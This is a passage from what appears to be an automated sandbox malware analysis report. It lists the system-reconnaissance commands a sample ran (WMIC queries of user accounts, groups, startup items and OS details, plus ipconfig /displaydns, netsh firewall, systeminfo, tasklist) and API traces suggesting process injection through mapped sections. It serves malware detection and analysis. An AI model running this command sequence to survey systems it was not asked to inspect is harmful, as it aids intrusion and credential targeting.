Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:18:21:19
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:18:21:22
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:18:21:23
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:18:21:26
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:18:21:33
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:18:21:35
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:18:21:38
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase:0x7ff725b70000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:32
                                                                                                      Start time:18:21:43
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:33
                                                                                                      Start time:18:21:47
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:34
                                                                                                      Start time:18:21:52
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:ipconfig /displaydns
                                                                                                      Imagebase:0x7ff656dd0000
                                                                                                      File size:35'840 bytes
                                                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:35
                                                                                                      Start time:18:21:53
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:route print
                                                                                                      Imagebase:0x7ff7162b0000
                                                                                                      File size:24'576 bytes
                                                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:36
                                                                                                      Start time:18:21:55
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:netsh firewall show state
                                                                                                      Imagebase:0x7ff769e60000
                                                                                                      File size:96'768 bytes
                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:37
                                                                                                      Start time:18:21:59
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:systeminfo
                                                                                                      Imagebase:0x7ff6afb10000
                                                                                                      File size:110'080 bytes
                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:39
                                                                                                      Start time:18:22:09
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:tasklist /v /fo csv
                                                                                                      Imagebase:0x7ff624fa0000
                                                                                                      File size:106'496 bytes
                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false


Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 40.7%
Signature Coverage: 44.9%
Total number of Nodes: 118
Total number of Limit Nodes: 4

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
• Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
• Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
• Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectView
• String ID:
• API String ID: 1652636561-0
• Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
• Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
• Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
• Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
• Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
• Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
• Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Control-flow Graph
• Rendered graph omitted; basic blocks span 401549-4018e3 and call 401193, NtDuplicateObject, NtCreateSection, NtMapViewOfSection (four call sites) and 4016e5.
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
• Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
• Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
• Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Control-flow Graph
• Rendered graph omitted; basic blocks span 40154f-4018e3 and call 401193, NtDuplicateObject, NtCreateSection, NtMapViewOfSection (four call sites) and 4016e5.
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
• Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
• Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
• Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Control-flow Graph
• Rendered graph omitted; basic blocks span 402f97-4030f3 and call RtlCreateUserThread and NtTerminateProcess.
APIs
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
• Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
• Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
• Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Control-flow Graph
• Rendered graph omitted; basic blocks span 5bf894-5bf8f2 and call CreateToolhelp32Snapshot, Module32First and 5bf553.
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005BF8BC
• Module32First.KERNEL32(00000000,00000224), ref: 005BF8DC
Memory Dump Source
• Source File: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5ad000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 6079205c447e79ef567868ad405e0f1641738a7531b1fe71b9cbbbc6123e8e32
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 0BF062361007116BE7203AB9AC8DBAA7AE8BF49725F100538F646910C0DB70FC454761

Control-flow Graph
• Rendered graph omitted; basic blocks span 52003c-52091d and call 520a3f, 520e0f, 520d90, VirtualAlloc, 520a69, VirtualProtect, 520cce, 520ce7, VirtualFree and LoadLibraryA.
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0052024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 919b4ee4c9051b2d158f225995026eaa3ecd924755c0c65d7b99845caff89d7f
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 4C526A75A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E54DAB392DB30AE85DF14

Control-flow Graph
• Rendered graph omitted; basic blocks span 520e0f-520e2c and call SetErrorMode twice.
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,00520223,?,?), ref: 00520E19
• SetErrorMode.KERNELBASE(00000000,?,?,00520223,?,?), ref: 00520E1E
Memory Dump Source
• Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: a764e639832798b8d740d17924903a9f0c649362d611a0acc80e9a5e0a88a39a
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 75D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DD90C1C770994046E5

Control-flow Graph
• Rendered graph omitted; basic blocks span 4018e6-4019a5 and call 401193, Sleep, 40141f and 401514.
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
• Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
• Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
• Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Control-flow Graph
• Rendered graph omitted; basic blocks span 401915-4019a5 (with a branch back to 4018c6-4018e3) and call 401193, Sleep, 40141f and 401514.
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
• Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
• Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
• Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Control-flow Graph

(graph image not recoverable; basic blocks: 4018f1-40194b [call 401193, Sleep, call 40141f] -> 40194d-401955 [call 401514] and 40195a-4019a5 [call 401193]; 40194d-401955 -> 40195a-4019a5)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
• Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
• Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
• Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Control-flow Graph

(graph image not recoverable; basic blocks: 401912-40194b [call 401193, Sleep, call 40141f] -> 40194d-401955 [call 401514] and 40195a-4019a5 [call 401193]; 40194d-401955 -> 40195a-4019a5)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
• Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
• Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
• Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Control-flow Graph

(graph image not recoverable; basic blocks: 5bf553-5bf58d [call 5bf866] -> 5bf5db (self-loop) and 5bf58f-5bf5c2 [VirtualAlloc, call 5bf5e0] -> 5bf5c7-5bf5d9 -> 5bf5db)
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005BF5A4
Memory Dump Source
• Source File: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5ad000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: c81399c4d0b82392261faedf3bf2c20f23df24a0a6ab6db2b57ea154ffcf0f14
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: EE112B79A00208EFDB01DF98C989E98BFF5AF08750F0580A4F9489B362D771EA50DB90

Control-flow Graph

(graph image not recoverable; basic blocks: 401925-40194b [call 401193, Sleep, call 40141f] -> 40194d-401955 [call 401514] and 40195a-4019a5 [call 401193]; 40194d-401955 -> 40195a-4019a5)
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
• Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
• Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
• Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 68369359295f17e5ff9a65917e847dcbda5c0b0d64a202c2997f0c44be603e7e
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: 6931ADB2901219CFDB10CF88D880AAEBBF5FF49324F24504AD401A7392C370EA85CFA4
Memory Dump Source
• Source File: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5ad000_bCnarg2O62.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction ID: 2bc78050264947433b0369b86a53f78e783cfa48db76fce7e65d11ee7e7818d7
• Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction Fuzzy Hash: 58117972340100EFDB54DE59DC91EE677EAFB88320B298465ED09CB316E675EC02C760
